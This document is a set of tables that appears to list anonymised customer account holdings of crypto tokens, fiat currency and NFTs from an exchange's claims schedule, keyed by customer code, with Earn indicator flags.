| 07345532 | | BRZ[3], BTC[.00383716], CUSDT[13.29806036], DAI[.00004057], DOGE[5985.67798584], SHIB[3], TRX[2], USD[0.11], USDT[0.92165589] | Yes | |
| 07345533 | | USD[10.00] | | |
| 07345534 | | USD[0.01] | | |
| 07345535 | | LTC[1.98171315], USD[0.00] | | |
| 07345536 | | USD[10.00] | | |
| 07345537 | | USD[10.00] | | |
| 07345538 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01], USDT[1] | | |
| 07345540 | | USD[10.00] | | |
| 07345543 | | USD[0.00] | | |
| 07345544 | | USD[10.00] | | |
| 07345545 | | BCH[0], BRZ[1], BTC[0], CUSDT[4], DOGE[0], ETH[0], EUR[0.00], MATIC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07345546 | | BAT[617.08353935], CUSDT[3], DOGE[14186.10796094], GRT[579.96449725], SOL[2.19382384], SUSHI[0], TRX[10859.79238496], USD[0.00] | Yes | |
| 07345547 | | AUD[0], AVAX[0], BAT[0], DOGE[0], KSHIB[0], SHIB[1], SOL[0.00006400], TRX[0], USD[0.01] | Yes | |
| 07345548 | | BRZ[3], CUSDT[5], TRX[1], USD[0.30] | | |
| 07345549 | | USD[10.00] | | |
| 07345550 | | USD[10.00] | | |
| 07345551 | | USD[10.00] | | |
| 07345552 | | AAVE[.0098083], BAT[.00000023], CUSDT[12], DOGE[.22560888], ETH[.00006194], ETHW[.00006194], GRT[.33833759], LINK[.01873522], SOL[.00447946], TRX[3], USD[-0.71] | Yes | |
| 07345553 | | CUSDT[1], DOGE[122.87699275], USD[0.00] | | |
| 07345554 | | SHIB[12197.95428167], USD[0.00], USDT[0] | Yes | |
| 07345555 | | USD[10.00] | | |
| 07345556 | | USD[10.00] | | |
| 07345557 | | BAT[1], BRZ[4], CUSDT[4], DOGE[1], GRT[2], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345558 | | BRZ[1], CUSDT[1], DOGE[2.42921225], TRX[2], USD[0.01] | | |
| 07345559 | | LINK[.00081168], USD[0.00] | | |
| 07345560 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07345561 | | USD[10.00] | | |
| 07345562 | | BTC[.00317446], CUSDT[5], USD[0.07] | Yes | |
| 07345563 | | USD[10.00] | | |
| 07345564 | | USD[10.00] | | |
| 07345565 | | LTC[.00107682], USD[0.04] | | |
| 07345566 | | USD[10.00] | | |
| 07345568 | | USD[10.00] | | |
| 07345569 | | USD[10.00] | | |
| 07345570 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], LINK[0], USD[0.00] | | |
| 07345571 | | DOGE[0.07531274], SHIB[5500000], TRX[.128], USD[2.49], USDT[0.00952054], YFI[.00098] | | |
| 07345572 | | USD[10.00] | | |
| 07345573 | | BRZ[1], CUSDT[1], DOGE[3994.03535451], TRX[1], UNI[.49351498], USD[0.00] | Yes | |
| 07345574 | | BAT[1], BRZ[1], BTC[.01311233], CUSDT[4], DOGE[2588.15532173], ETH[.21783823], ETHW[.21783823], USD[27.09] | | |
| 07345575 | | SUSHI[.57369826], USD[0.00] | | |
| 07345576 | | BAT[1], CUSDT[2], ETH[0.00000288], ETHW[0.00000288], TRX[1], USD[0.00] | Yes | |
| 07345577 | | DOGE[0], TRX[0.94418638], USD[0.00], USDT[0] | | |
| 07345578 | | BRZ[2], TRX[6], USD[0.00] | | |
| 07345579 | | CUSDT[3], DOGE[216.08671743], SOL[2.20041065], USD[20.77] | Yes | |
| 07345580 | | CUSDT[3], DOGE[1127.37843928], USD[20.00] | | |
| 07345581 | | USD[10.00] | | |
| 07345582 | | BRZ[2], CUSDT[4], USD[0.00], USDT[0] | | |
| 07345583 | | USD[10.00] | | |
| 07345584 | | USD[10.00] | | |
| 07345585 | | USD[10.00] | | |
| 07345586 | | USD[10.00] | | |
| 07345587 | | LTC[0], USD[0.02] | | |
| 07345588 | | BRZ[1], USD[0.00] | Yes | |
| 07345589 | | USD[10.00] | | |
| 07345590 | | USD[10.00] | | |
| 07345591 | | BAT[0], BTC[0], DOGE[95.13421810], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07345593 | | USD[10.00] | | |
| 07345594 | | DOGE[112.89501287], USD[1.57] | | |
| 07345595 | | MATIC[7.84484862], USD[0.00] | Yes | |
| 07345596 | | BRZ[1], DOGE[1777.61090118], USD[0.59] | | |
| 07345597 | | USD[0.00] | | |
| 07345598 | | DOGE[0], USD[0.00] | | |
| 07345599 | | BTC[.00017609], USD[0.00] | | |
| 07345600 | | USD[10.00] | | |
| 07345601 | | BTC[.00014532], USD[11.09] | Yes | |
| 07345602 | | USD[10.00] | | |
| 07345603 | | USD[10.00] | | |
| 07345604 | | DOGE[1], TRX[1], USD[83.54] | | |
| 07345605 | | BAT[0], BRZ[0.00000046], CUSDT[25], DOGE[0], ETH[0.00000001], ETHW[0.00000001], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0.00010651], UNI[0], USD[0.01], YFI[0.00000001] | | |
| 07345606 | | USD[10.00] | | |
| 07345607 | | USD[10.00] | | |
| 07345608 | | USD[0.00] | | |
| 07345609 | | BTC[0], USD[0.00] | | |
| 07345611 | | BRZ[2], CUSDT[11], DOGE[1518.02948909], SOL[21.24699882], TRX[792.75607101], USD[144.17] | Yes | |
| 07345612 | | USD[10.00] | | |
| 07345613 | | USD[10.00] | | |
| 07345614 | | USD[10.00] | | |
| 07345615 | | USD[10.00] | | |
| 07345616 | | BRZ[1], BTC[.0054964], CUSDT[4], DOGE[1262.82510954], GRT[.07525452], SHIB[741125.41473003], TRX[2], USD[0.00] | Yes | |
| 07345617 | | USD[10.00] | | |
| 07345618 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345619 | | CUSDT[1126.41548741], DOGE[146.26807164], SHIB[2249331.94985523], TRX[565.07570227], USD[108.50] | Yes | |
| 07345620 | | USD[10.00] | | |
| 07345621 | | BRZ[1], CUSDT[1], DOGE[.64181082], SOL[1.41340718], USD[0.30] | Yes | |
| 07345622 | | USD[10.00] | | |
| 07345624 | | USD[10.00] | | |
| 07345625 | | CUSDT[6], DOGE[.47550231], ETH[.00062393], ETHW[.00062393], TRX[1.94359091], USD[0.01] | | |
| 07345626 | | BAT[6.993], DOGE[32.27], ETH[.004995], ETHW[.061767], SHIB[6593400], UNI[.3996], USD[3.47], USDT[1.04860992] | | |
| 07345627 | | USD[10.00] | | |
| 07345629 | | BAT[7.4463815], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07345630 | | USD[0.00], USDT[0] | | |
| 07345631 | | CUSDT[1], DOGE[3], ETH[0.00000038], ETHW[0.00000038], GRT[1], SHIB[5], SOL[0], TRX[1], USD[1.15], USDT[0] | Yes | |
| 07345632 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07345633 | | CUSDT[3], DOGE[1.80815424], GRT[17.92843313], SOL[.0006426], USD[0.00] | | |
| 07345634 | | USD[10.00] | | |
| 07345635 | | BRZ[1], CUSDT[3], DOGE[.00999798], ETH[.05114775], ETHW[.05114775], TRX[1], USD[0.00] | | |
| 07345636 | | USD[10.00] | | |
| 07345639 | | BTC[0.00026556], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07345640 | | USD[10.00] | | |
| 07345641 | | BRZ[2], CUSDT[3], TRX[4], USD[0.00] | | |
| 07345643 | | BTC[.00003179], CUSDT[1], USD[0.00] | | |
| 07345644 | | BCH[.03280117], BRZ[1], CUSDT[10], DAI[.00003435], DOGE[558.99164713], ETH[.01071934], ETHW[.01071934], GRT[10.63340887], SHIB[1], SOL[3.22845302], TRX[144.34617025], USD[43.31] | | |
| 07345645 | | BTC[.00025716], CUSDT[1], DOGE[133.64184999], USD[10.00] | | |
| 07345646 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07345647 | | USD[10.00] | | |
| 07345648 | | USD[10.00] | | |
| 07345649 | | USD[10.00] | | |
| 07345650 | | USD[0.00] | | |
| 07345651 | | AAVE[0], BTC[0.00000044], DOGE[0], GRT[0], SUSHI[0], UNI[0], USD[0.01] | Yes | |
| 07345652 | | BAT[6.55579102], BRZ[4], CUSDT[5], DOGE[56802.64918305], GRT[4.23876371], LINK[1.10518042], SUSHI[1.09929189], TRX[1], UNI[1.10518042], USD[0.00], USDT[9.88196925] | Yes | |
| 07345653 | | USD[10.00] | | |
| 07345655 | | BTC[.00029551], CUSDT[1], DOGE[516.83874245], ETH[.00251124], ETHW[.00251124], LTC[.02877003], SHIB[62893.081761], SOL[0.28897872], USD[0.00] | | |
| 07345656 | | USD[10.00] | | |
| 07345657 | | BRZ[2], CUSDT[1], DOGE[3.04157227], TRX[2.00258403], USD[0.00] | | |
| 07345658 | | USD[0.00] | | |
| 07345659 | | BRZ[1], CUSDT[3], DOGE[2000.01809328], TRX[3], USD[0.81] | | |
| 07345661 | | USD[10.00] | | |
| 07345662 | | BAT[197.208], DOGE[20.61833747], GRT[559.06208816], LINK[4.72438096], SUSHI[.2605], USD[0.01], USDT[0] | | |
| 07345663 | | USD[10.98] | Yes | |
| 07345664 | | DOGE[267.58923785], SHIB[2886917.87670976], USD[48.26] | Yes | |
| 07345665 | | USD[10.00] | | |
| 07345666 | | USD[10.00] | | |
| 07345667 | | LINK[.36218854], USD[0.00] | | |
| 07345668 | | USD[0.00] | | |
| 07345669 | | CUSDT[4], USD[0.04] | | |
| 07345670 | | BF_POINT[200], BTC[0], CUSDT[3], LINK[.02480985], USD[0.00] | | |
| 07345671 | | CUSDT[8], USD[0.01] | | |
| 07345672 | | USD[10.00] | | |
| 07345673 | | ETH[.141858], ETHW[.141858], SOL[53.0037], USD[4.00], USDT[2.87896099] | | |
| 07345674 | | USD[151.29] | | |
| 07345675 | | USD[0.00] | | |
| 07345677 | | USD[10.00] | | |
| 07345678 | | USD[10.06] | | |
| 07345679 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07345680 | | DOGE[0], USD[0.00], USDT[1] | | |
| 07345681 | | TRX[1], USD[0.00] | | |
| 07345682 | | BRZ[1], CUSDT[5], DOGE[2], TRX[3], USD[0.00] | | |
| 07345684 | | BRZ[4], CUSDT[11], DOGE[1336.17940517], ETHW[.31569466], SHIB[1], TRX[2], USD[0.00] | | |
| 07345685 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345686 | | USD[10.00] | | |
| 07345687 | | USD[10.00] | | |
| 07345688 | | TRX[196.11288571], USD[0.00] | | |
| 07345689 | | USD[10.00] | | |
| 07345691 | | USD[10.00] | | |
| 07345692 | | USD[0.59] | | |
| 07345693 | | ETH[.00552861], ETHW[.00552861], USD[0.00] | | |
| 07345694 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07345695 | | DOGE[.00369667], SHIB[1654.85320223], USD[0.00] | Yes | |
| 07345697 | | DOGE[138.73237179], USD[0.00] | | |
| 07345699 | | USD[0.00] | | |
| 07345700 | | USD[10.00] | | |
| 07345701 | | BCH[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], TRX[0], UNI[0], USD[0.02], USDT[0] | Yes | |
| 07345702 | | USD[11.08] | Yes | |
| 07345703 | | USD[10.00] | | |
| 07345704 | | SHIB[267408.84107123], USD[0.06] | | |
| 07345705 | | CUSDT[1], DOGE[2], SOL[0], TRX[1], USD[0.01] | | |
| 07345706 | | BRZ[10], CUSDT[21], DOGE[2], TRX[3], USD[0.00], USDT[1] | | |
| 07345707 | | DOGE[33.71760955], USD[0.00] | | |
| 07345708 | | USD[10.00] | | |
| 07345709 | | DOGE[1094.09433258], USD[0.00] | | |
| 07345710 | | USD[10.00] | | |
| 07345711 | | USD[0.00] | Yes | |
| 07345712 | | USD[0.00] | Yes | |
| 07345713 | | USD[10.00] | | |
| 07345714 | | DOGE[1], USD[0.00] | | |
| 07345715 | | USD[10.00] | | |
| 07345717 | | CUSDT[1], USD[0.38] | | |
| 07345718 | | USD[10.00] | | |
| 07345719 | | BRZ[1], CUSDT[271.09406418], DAI[11.00316334], DOGE[16.80021291], MATIC[.34172815], TRX[4], USD[2.95] | Yes | |
| 07345720 | | USD[10.00] | | |
| 07345721 | | USD[10.00] | | |
| 07345722 | | USD[10.00] | | |
| 07345723 | | CUSDT[1], USD[0.00] | | |
| 07345724 | | USD[10.00] | | |
| 07345725 | | BAT[0], BRZ[0], DOGE[36.92002105], ETH[0], LINK[.00292205], TRX[1], UNI[0], USD[0.43], USDT[0.00003127] | Yes | |
| 07345726 | | USD[10.00] | | |
| 07345727 | | USD[10.00] | | |
| 07345728 | | DOGE[703.51633889], USD[10.00] | | |
| 07345729 | | SHIB[88758.27182622], USD[0.00] | Yes | |
| 07345730 | | DOGE[199.41949147], USD[0.00] | | |
| 07345733 | | USD[10.00] | | |
| 07345734 | | USD[10.00] | | |
| 07345735 | | USD[10.00] | | |
| 07345736 | | USD[10.00] | | |
| 07345737 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01], USDT[2] | | |
| 07345738 | | USD[0.00] | | |
| 07345739 | | USD[10.00] | | |
| 07345740 | | CUSDT[7], DOGE[2386.00347398], GRT[4.19836981], USD[0.00], USDT[19.87821373] | | |
| 07345741 | | USD[0.00] | | |
| 07345742 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SOL[0.04089390], USD[0.00] | Yes | |
| 07345743 | | BRZ[1], CUSDT[11], DOGE[1.50287617], GRT[654.7234029], SHIB[1], TRX[2], USD[0.11], USDT[0] | | |
| 07345744 | | BTC[.00011532], USD[0.00] | | |
| 07345745 | | USD[10.00] | | |
| 07345746 | | USD[10.00] | | |
| 07345747 | | USD[10.00] | | |
| 07345748 | | DOGE[2], SHIB[2], TRX[1], USD[326.73] | Yes | |
| 07345749 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345750 | | USD[0.00] | | |
| 07345751 | | CUSDT[3], DOGE[1], SOL[.00067112], TRX[4], USD[0.00] | | |
| 07345752 | | USD[35.29] | | |
| 07345753 | | USD[10.00] | | |
| 07345754 | | USD[10.00] | | |
| 07345755 | | BRZ[1], CUSDT[4], TRX[3], USD[0.01] | | |
| 07345756 | | BTC[.00040935], CUSDT[5], DOGE[99.11048058], ETH[.00648853], ETHW[.00640645], KSHIB[341.81583509], SHIB[3723420.41405113], SOL[.10620923], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07345757 | | USD[10.00] | | |
| 07345758 | | USD[10.88] | Yes | |
| 07345759 | | USD[10.00] | | |
| 07345760 | | DOGE[1033.29254655], USD[10.00] | | |
| 07345761 | | USD[10.00] | | |
| 07345762 | | DOGE[1], USD[0.01] | | |
| 07345763 | | CUSDT[4], DOGE[812.31070869], USD[0.94] | | |
| 07345764 | | DOGE[724.90926747], USD[0.00] | | |
| 07345765 | | USD[0.00] | | |
| 07345766 | | CUSDT[3], DOGE[187.91559993], ETH[.00425515], ETHW[.00420039], TRX[1], USD[0.01], USDT[1.10771666] | Yes | |
| 07345768 | | BRZ[3], CUSDT[19], DOGE[.00042954], LINK[.00944923], SOL[.00001261], SUSHI[.00001624], TRX[9.0885354], USD[0.01], USDT[1.00000001] | | |
| 07345769 | | BRZ[1], CUSDT[25], LTC[.18981279], TRX[72.87621509], USD[0.04] | Yes | |
| 07345770 | | USD[10.00] | | |
| 07345772 | | DOGE[.00008649], USD[0.95], USDT[0.00006718] | | |
| 07345773 | | USD[10.00] | | |
| 07345774 | | USD[10.00] | | |
| 07345775 | | USD[0.00] | | |
| 07345776 | | BTC[.00061222], CUSDT[5], DOGE[320.92375014], ETH[.0055381], ETHW[.0055381], LINK[1.02039865], LTC[.04375383], SOL[1.17069239], TRX[61.53812449], USD[0.01] | | |
| 07345777 | | USD[0.00] | | |
| 07345778 | | BRZ[1], USD[0.02] | | |
| 07345779 | | BTC[.00069163], CUSDT[8], DOGE[2099.54642772], TRX[837.78195191], USD[0.01] | Yes | |
| 07345780 | | USD[10.00] | | |
| 07345781 | | USD[10.00] | | |
| 07345782 | | TRX[1], USD[0.01] | | |
| 07345783 | | USD[10.00] | | |
| 07345784 | | USD[0.00] | | |
| 07345785 | | USD[10.00] | | |
| 07345786 | | USD[10.81] | Yes | |
| 07345787 | | BCH[0], BRZ[0], BTC[0], CAD[0.00], DOGE[0], ETH[0], EUR[0.00], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07345788 | | USD[10.00] | | |
| 07345789 | | CUSDT[1], DOGE[63.23700747], ETH[.00415342], ETHW[.00415342], TRX[1], USD[0.25] | | |
| 07345790 | | USD[10.00] | | |
| 07345791 | | DOGE[176.79225657], USD[0.00] | | |
| 07345792 | | TRX[189.07102861], USD[0.00] | | |
| 07345793 | | USD[10.00] | | |
| 07345794 | | TRX[1], USD[0.01], USDT[1] | | |
| 07345795 | | USD[10.00] | | |
| 07345796 | | CUSDT[1], DOGE[829.14785257], USD[0.00] | | |
| 07345797 | | USD[10.00] | | |
| 07345798 | | BRZ[3], BTC[0], CUSDT[8], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07345799 | | USD[10.00] | | |
| 07345800 | | USD[10.00] | | |
| 07345801 | | AUD[0.00], BAT[0], BCH[0], BTC[0.00000001], DOGE[0], ETH[0.00133524], ETHW[0], LTC[0.00000110], MKR[0], NFT [323401668065435088/Entrance Voucher #26869][1], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07345802 | | USD[10.00] | | |
| 07345803 | | BAT[0], BCH[0], GRT[0], LTC[0], SUSHI[0], USD[0.06] | Yes | |
| 07345804 | | USD[10.00] | | |
| 07345805 | | ETH[.0000051], ETHW[.0000051], GRT[1], LINK[8.88304872], SHIB[1.00107372], SOL[4.21774794], USD[0.00] | Yes | |
| 07345806 | | USD[10.00] | | |
| 07345807 | | GRT[4.47485454], USD[0.00] | | |
| 07345808 | | BRZ[1], CUSDT[3], DOGE[6.20682633], TRX[2377.29486402], USD[0.00] | Yes | |
| 07345809 | | BTC[.00000011], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345810 | | USD[0.00] | | |
| 07345811 | | BRZ[1], USD[0.01] | | |
| 07345812 | | USD[0.00] | | |
| 07345813 | | USD[0.00] | | |
| 07345815 | | USD[0.00] | | |
| 07345816 | | DOGE[2], TRX[467.40792825], USD[0.00] | | |
| 07345817 | | USD[0.00] | | |
| 07345818 | | USD[0.00] | | |
| 07345819 | | USD[0.00] | | |
| 07345820 | | USD[0.00] | | |
| 07345821 | | DOGE[1.00001731], TRX[1], USD[19.84] | | |
| 07345822 | | CUSDT[3], DOGE[3761.84211451], TRX[2], USD[0.00] | Yes | |
| 07345823 | | USD[0.00] | | |
| 07345824 | | USD[11.08] | Yes | |
| 07345825 | | BCH[.03429757], BTC[.00054125], CUSDT[14], DOGE[325.40144966], ETH[.02747474], ETHW[.02747474], LINK[.1046416], LTC[.29235294], SHIB[290697.6744186], SOL[.28522562], TRX[126.75126304], USD[0.00] | | |
| 07345826 | | USD[0.00] | | |
| 07345827 | | USD[0.00] | | |
| 07345828 | | USD[0.00] | | |
| 07345829 | | TRX[1], USD[0.00] | | |
| 07345831 | | USD[0.00] | | |
| 07345832 | | CUSDT[4], TRX[2], USD[0.00] | | |
| 07345833 | | USD[0.00] | | |
| 07345834 | | CUSDT[2], DOGE[134.81110409], SHIB[1], UNI[.99254993], USD[179.70] | | |
| 07345835 | | BRZ[1], CUSDT[11], DOGE[0.00670999], ETH[0], TRX[1], USD[0.00], USDT[1] | | |
| 07345836 | | DOGE[1], USD[0.01] | | |
| 07345837 | | BAT[1], GRT[1], USD[0.01] | | |
| 07345838 | | DOGE[53282.98633391], TRX[2484.26863151], USD[0.00], USDT[1] | | |
| 07345839 | | USD[0.00] | | |
| 07345840 | | AVAX[0], BAT[0], BCH[0], BRZ[0], DAI[0], DOGE[0], ETH[0.00000001], ETHW[0.00000970], GRT[0], MATIC[0], NFT (568603575626455896/Entrance Voucher #29452)[1], PAXG[0], SHIB[4.20098413], SOL[0.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000004] | Yes | |
| 07345841 | | USD[0.00] | | |
| 07345843 | | USD[0.00] | | |
| 07345844 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07345845 | | USD[0.00] | | |
| 07345846 | | USD[0.00] | | |
| 07345847 | | AVAX[1.02716438], CUSDT[34.78635393], DOGE[70.29030864], GRT[23.46211496], SHIB[1687774.50698012], SOL[1.11696355], SUSHI[1.57443468], TRX[2], USD[58.34] | Yes | |
| 07345848 | | BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[0.00000001] | | |
| 07345849 | | BAT[.00029613], BTC[.00016786], CUSDT[9.01189447], DOGE[1.00000167], ETH[.00642913], ETHW[.00642913], LINK[1.69757485], SHIB[1], SOL[.46603655], SUSHI[.70502925], USD[0.71], USDT[0] | | |
| 07345850 | | USD[0.00] | | |
| 07345851 | | BAT[2.12068787], BRZ[3], CUSDT[7], DOGE[2], GRT[1.00498957], SOL[.00009268], TRX[5], USD[0.01], USDT[1.10485760] | Yes | |
| 07345852 | | USD[0.00] | | |
| 07345853 | | BTC[.00448839], CUSDT[1], DOGE[6], ETH[.08362337], ETHW[.08362337], NFT (300842163276382393/Frog #2195)[1], NFT (373413205519700814/Cyber Frogs Ramen)[1], NFT (428893188095083957/Tech Rifle)[1], NFT (432211774595183169/Golden bone pass)[1], NFT (436421187934889433/Frog #5190)[1], NFT (510945881795003578/Saudi Arabia Ticket Stub #2452)[1], NFT (545879851672174046/Barcelona Ticket Stub #469)[1], SOL[6.27315649], TRX[1], USD[0.00] | | |
| 07345854 | | BRZ[2], BTC[.00140213], CUSDT[428.25214098], DOGE[84.22857387], ETH[.03438114], ETHW[.03395675], SHIB[1], SOL[76.20751966], TRX[3], USD[0.00] | Yes | |
| 07345855 | | DOGE[154.76376868], USD[0.00] | Yes | |
| 07345856 | | USD[0.00] | | |
| 07345857 | | CUSDT[1], DOGE[4289.33448401], USD[10.00] | | |
| 07345858 | | CUSDT[1], LTC[0], USD[0.00] | | |
| 07345859 | | USD[0.00] | | |
| 07345860 | | BRZ[2], CUSDT[8], DOGE[1], TRX[9.01102039], USD[0.00], USDT[4.36651483] | Yes | |
| 07345861 | | USD[0.00] | | |
| 07345862 | | USD[0.00] | | |
| 07345863 | | BRZ[1], CUSDT[10], DOGE[43.09883051], TRX[1], USD[0.56], USDT[1] | | |
| 07345864 | | USD[0.00] | | |
| 07345865 | | USD[0.00] | | |
| 07345866 | | CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07345867 | | USD[0.00] | | |
| 07345868 | | USD[0.01], USDT[0] | | |
| 07345869 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345870 | | BAT[1], BRZ[1], BTC[.00001033], CUSDT[1.14761109], DOGE[0.37991623], ETH[.00051202], ETHW[0.00051201], GRT[.00101397], SHIB[131183607.32622261], TRX[2], USD[-1.48], USDT[0.00253723] | Yes | |
| 07345871 | | BRZ[0], DOGE[60.17692869], USD[0.12], USDT[1] | | |
| 07345872 | | USD[10.00] | | |
| 07345873 | | USD[10.00] | | |
| 07345875 | | ETH[0], USD[0.00] | | |
| 07345876 | | CUSDT[1], DOGE[171.02589185], USD[0.00] | | |
| 07345877 | | USD[10.00] | | |
| 07345878 | | DOGE[2866.01170946], USD[0.00] | | |
| 07345879 | | CUSDT[15], DOGE[2], SHIB[1], SOL[8.02853794], USD[1.58] | Yes | |
| 07345880 | | USD[26.05] | | |
| 07345881 | | BAT[1], BRZ[1], CUSDT[26], DOGE[19181.46975208], GRT[17.08407849], SOL[.36220828], TRX[3], USD[0.00], USDT[1] | | |
| 07345882 | | USD[10.00] | | |
| 07345883 | | USD[10.00] | | |
| 07345884 | | USD[10.00] | | |
| 07345885 | | USD[10.00] | | |
| 07345887 | | USD[10.00] | | |
| 07345888 | | USD[10.00] | | |
| 07345889 | | CUSDT[2], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07345890 | | USD[0.01] | | |
| 07345892 | | BTC[0], CUSDT[7], DOGE[1773.09136129], LTC[0.06796490], TRX[110.87994049], USD[0.39] | Yes | |
| 07345894 | | USD[10.00] | | |
| 07345895 | | BRZ[0], CUSDT[3], DOGE[56.03491013], ETH[.00993414], ETHW[.00981102], SHIB[363765.9634619], TRX[2], USD[11.65] | Yes | |
| 07345896 | | USD[10.00] | | |
| 07345897 | | DOGE[96166934], USD[0.00] | | |
| 07345898 | | USD[10.00] | | |
| 07345899 | | USD[11.08] | Yes | |
| 07345900 | | BRZ[1], BTC[0], CUSDT[7], SOL[0], TRX[2], USD[0.07], USDT[2.00182932] | | |
| 07345901 | | TRX[0], USD[0.00] | | |
| 07345902 | | DOGE[2.87699275], USD[28.67] | | |
| 07345903 | | CUSDT[3], DOGE[3.73187203], TRX[1], USD[0.00] | | |
| 07345904 | | USD[10.00] | | |
| 07345906 | | BAT[21.01186350], BTC[.00242386], GRT[129.89061304], SOL[2.30485575], SUSHI[1.46987988], TRX[1044.33369318], USD[0.00], USDT[.02163719] | | |
| 07345907 | | DOGE[800.80625493], USD[10.00] | | |
| 07345908 | | CUSDT[2], DOGE[197.29914358], SHIB[1], USD[0.10], USDT[0] | Yes | |
| 07345909 | | USD[10.00] | | |
| 07345910 | | USD[10.00] | | |
| 07345911 | | BCH[.92712], BTC[0.00007914], CUSDT[9920.169], DOGE[1177.188], ETH[9.366624], ETHW[9.366624], GRT[233.064], SHIB[66833100], SUSHI[.482], TRX[15801.084], USD[17.69], USDT[6.13673571], YFI[1.509436] | | |
| 07345912 | | USD[10.00] | | |
| 07345913 | | USD[0.00], USDT[0] | | |
| 07345914 | | USD[10.00] | | |
| 07345915 | | USD[10.00] | | |
| 07345916 | | USD[10.00] | | |
| 07345917 | | USD[10.00] | | |
| 07345918 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07345919 | | CUSDT[1], DOGE[15.99378371], USD[2.82] | | |
| 07345920 | | USD[10.00] | | |
| 07345921 | | CUSDT[2], DOGE[3], ETH[.07497932], ETHW[.07497932], USD[0.00] | | |
| 07345923 | | CUSDT[3], DOGE[4605.03271108], ETH[.07196166], ETHW[.07196166], TRX[4], USD[0.06] | | |
| 07345924 | | AVAX[0.02332651], BAT[0], DAI[.02139542], DOGE[1], GRT[0], KSHIB[13.75817750], SHIB[151426.67832441], TRX[23.64395093], USD[0.00] | Yes | |
| 07345925 | | USD[10.00] | | |
| 07345926 | | BRZ[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07345927 | | USD[10.00] | | |
| 07345929 | | CUSDT[1], DOGE[2005.44098705], USD[0.00] | | |
| 07345931 | | DOGE[9.0248544], USD[0.00] | | |
| 07345932 | | DOGE[2185.92867419], USD[0.00] | | |
| 07345933 | | DOGE[3], TRX[2], USD[0.00] | | |
| 07345934 | | USD[10.00] | | |
| 07345935 | | BTC[.00007665], EUR[0.00], TRX[97.54309722], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345936 | | BAT[1], BRZ[3], DOGE[2.00001983], TRX[.00004248], USD[1.72], USDT[0] | | |
| 07345937 | | CUSDT[4], DOGE[313.49326673], TRX[1], USD[1.82] | | |
| 07345938 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07345939 | | DOGE[8.0585871], USD[0.00] | | |
| 07345940 | | CUSDT[1], DOGE[.14729515], ETH[.00130845], ETHW[.00129477], GRT[7.26373242], KSHIB[83.70797885], SHIB[144499.2647484], TRX[206.15691178], USD[0.42] | Yes | |
| 07345941 | | USD[10.00] | | |
| 07345942 | | USD[10.00] | | |
| 07345943 | | CUSDT[2], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07345944 | | DOGE[.02286534], USD[0.00] | | |
| 07345946 | | TRX[217.77046165], USD[0.00] | | |
| 07345947 | | ETH[.00000494], ETHW[.0000494], TRX[1], USD[0.00] | | |
| 07345948 | | BRZ[1], BTC[.00973576], CUSDT[3], ETH[.12753051], ETHW[.12753051], TRX[2], USD[0.00], USDT[0] | | |
| 07345949 | | LTC[0], USD[0.07] | | |
| 07345950 | | USD[10.00] | | |
| 07345951 | | BTC[.00203183], CUSDT[3], DOGE[3610.63129306], ETH[.03209467], ETHW[.03209467], LTC[.18785645], TRX[1], USD[0.00] | | |
